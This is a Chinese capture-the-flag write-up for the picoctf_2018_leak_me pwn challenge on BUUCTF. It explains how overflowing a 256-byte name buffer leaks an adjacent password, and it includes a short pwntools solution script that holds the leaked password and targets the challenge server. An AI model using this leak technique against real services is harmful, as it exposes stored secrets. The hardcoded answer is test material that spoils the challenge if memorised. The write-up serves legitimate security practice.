[BUUCTF-pwn]——picoctf_2018_leak_me(内涵peak小知识)
[BUUCTF-pwn]——picoctf_2018_leak_me
题目没什么难度,但是可能反汇编的时候你们可能会出现一些问题。
peak小知识
pwn题,有时会碰到无法反汇编的情况,大多数情况下,都是call的位置报错,双击函数,按F5人为给它反汇编,再返回就可以了。不过有时候,是IDA栈指针的问题,大多数还是前者居多。
思路
在IDA中,v6代表name s是password.距离0x100也就是256。
输入256个字符后,我们可以直接将password泄露出来。这样我们就可以在下面调用flag函数了。
写个小dome leek出来password再说。
exploit
from pwn import *
p = remote("node3.buuoj.cn",27223)
p.sendline('a')
p.recv()
p.sendline('a_reAllY_s3cuRe_p4s$word_f85406')p.interactive()
[BUUCTF-pwn]——picoctf_2018_leak_me(内涵peak小知识)相关推荐
- [Jarvis OJ - PWN]——Typo(内涵peak小知识)
[Jarvis OJ - PWN]--Typo 题目地址: https://www.jarvisoj.com/challenges 题目: 还是先check一下, 是arm架构.还是第一次遇到. pe ...
- [攻防世界 pwn]——pwn1(内涵peak小知识)
[攻防世界 pwn]--pwn1 题目地址:https://adworld.xctf.org.cn/ 题目: peak小知识 这道题目的关键就是泄露canary,通常我们泄露canary有两种方法,遇 ...
- [攻防世界 pwn]——time_formatter(内涵peak小知识)
[攻防世界 pwn]--time_formatter 题目地址: https://adworld.xctf.org.cn/ 题目: 这是一道堆利用的题, UAFF(use After Free)漏洞. ...
- [攻防世界 pwn]——string(内涵peak小知识)
[攻防世界 pwn]--string 题目地址:https://adworld.xctf.org.cn/ 题目: peak小知识 mmap函数作用,mmap主要是将文件映射到一段内存去同时设置那段内存 ...
- [BUUCTF-pwn]——[极客大挑战 2019]Not Bad(ORW)(内涵peak小知识)
[BUUCTF-pwn]--[极客大挑战 2019]Not Bad 又是一道收获满满的题目. peak小知识 seccomp: seccomp是一种内核中的安全机制,正常情况下,程序可以使用所有的sy ...
- [BUUCTF-pwn]——mrctf2020_shellcode_revenge(可见字符shellcode)(内涵peak小知识)
[BUUCTF-pwn]--mrctf2020_shellcode_revenge(可见字符shellcode) 检查了下保护发现NX 没有开,肯定要自己写shellcode呀. 不过这道题,刷新了我 ...
- [BUUCTF-pwn]——ciscn_2019_es_2(内涵peak小知识)
[BUUCTF-pwn]--ciscn_2019_es_2 题目地址: https://buuoj.cn/challenges#ciscn_2019_es_2 这是一道栈劫持的题,第一次写这种题的题解 ...
- BUUCTF PWN rip1 WP
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录. 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后 ...
- 【C#小知识】C#中一些易混淆概念总结(三)---------结构,GC,静态成员,静态类...
目录: [C#小知识]C#中一些易混淆概念总结 [C#小知识]C#中一些易混淆概念总结(二) ---------------------------------------分割线----------- ...
最新文章
- 用Genymotion来调试android应用
- C语言函数知识体系大学霸IT达人
- Python3.6学习笔记(二)
- cubemx串口的发送与接收_串口收发模块设计
- React 测试指南
- 50道编程小题目之【判断是一年的第几天】
- NLP之路-Deep Learning in NLP (一)词向量和语言模型
- SAP License:利用MM的预留功能进行生产控制
- php文件便利,PHP便利文件夹下所有文件,创建压缩包
- java教程:十分钟理解Java中的弱引用
- Java实现顺序表的创建及基本操作(增删改查)
- 编译caffe2遇到的坑
- MATLAB中subs函数
- 【银河麒麟V10】【桌面】火狐浏览器设置主页不生效
- 罗格斯大学电子与计算机工程,罗格斯大学电子和计算机工程理学硕士研究生申请要求及申请材料要求清单...
- Win10系统桌面颜色变为灰黑色恢复正常颜色方法
- 先知社区-文章爬虫-python脚本
- 获取微信微信聊天记录相关文章
- 1-1/2+1/3…-1/100,求和
- 万科物业java面试经验,万科物业人力资源面试经验
热门文章
- Swift云存储特性研究
- 2010年写给自己的一封信
- [Python图像处理] 三十一.图像点运算处理两万字详细总结(灰度化处理、阈值化处理)
- iOS之深入解析YYImage图片处理的底层原理
- 并查集(Union Find Set)
- 2020\Simulation_1\2.约数个数
- 44. Wildcard Matching 通配符匹配
- 了解单片机及单片机的控制原理和 DX516 的用法,控制一个 LED 灯的亮
- javascript经典实例_JavaScript 经典实例收集整理
- 服务器内存不认硬盘_8分钟了解服务器硬件知识